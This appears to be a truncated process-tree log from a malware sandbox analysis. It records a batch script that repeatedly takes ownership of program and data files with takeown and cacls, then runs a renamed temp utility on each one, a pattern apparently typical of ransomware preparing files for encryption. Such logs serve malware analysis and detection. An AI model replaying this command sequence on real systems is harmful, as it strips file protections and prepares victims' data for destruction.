C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:1364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:552
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:1900
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1252
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:1180
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵PID:1564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:996
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""2⤵PID:1744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C3⤵PID:1776
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"3⤵
- Modifies file permissions
PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "blank.jtp" -nobanner3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "blank.jtp" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""2⤵PID:552
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C3⤵PID:2044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"3⤵
- Modifies file permissions
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "To_Do_List.jtp" -nobanner3⤵PID:1424
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "To_Do_List.jtp" -nobanner4⤵PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui""2⤵PID:1540
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:1700
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui"3⤵PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:1764
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:980
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""2⤵PID:1184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:848
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1516
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵PID:1844
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵
- Modifies file permissions
PID:1108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MyriadCAD.otf" -nobanner3⤵PID:1776
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MyriadCAD.otf" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵PID:1252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "create_form.gif" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "create_form.gif" -nobanner4⤵PID:1740
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:1424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵
- Modifies file permissions
PID:752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "info.gif" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "info.gif" -nobanner4⤵PID:1108
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:1764
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:1100
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵
- Modifies file permissions
PID:1168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:920
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:1252
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵
- Modifies file permissions
PID:1052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "trash.gif" -nobanner3⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "trash.gif" -nobanner4⤵PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:1108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:1900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵PID:1184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:552
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:996
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:1252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵
- Modifies file permissions
PID:1844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:1540
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:1180
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:1776
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:1424
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵
- Modifies file permissions
PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "can.hyp" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "can.hyp" -nobanner4⤵PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:1644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵PID:920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "usa37.hyp" -nobanner3⤵PID:848
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "usa37.hyp" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:1432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:2004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵PID:1104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:1108
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:1764
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:1000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵PID:552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:1712
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:1540
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵PID:1052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:752
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:2004
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui""2⤵PID:1108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:1432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui"3⤵PID:772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1000
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:552
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\fr-FR\WinMail.exe.mui""2⤵PID:1516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\fr-FR\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:1960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\fr-FR\WinMail.exe.mui"3⤵PID:1424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:1588
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:1052
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:1000
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:1844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1540
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""2⤵PID:1588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:1564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1740
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1184
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""2⤵PID:1432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1108
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:1960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:1000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"3⤵PID:2004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:1700
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:1100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "directories.acrodata" -nobanner3⤵PID:1620
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "directories.acrodata" -nobanner4⤵PID:904
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe""2⤵PID:588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe" /E /G Admin:F /C3⤵PID:1984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe"3⤵PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "vcredist_x64.exe" -nobanner3⤵PID:1252
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "vcredist_x64.exe" -nobanner4⤵PID:1000
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui""2⤵PID:1516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:1712
-
-
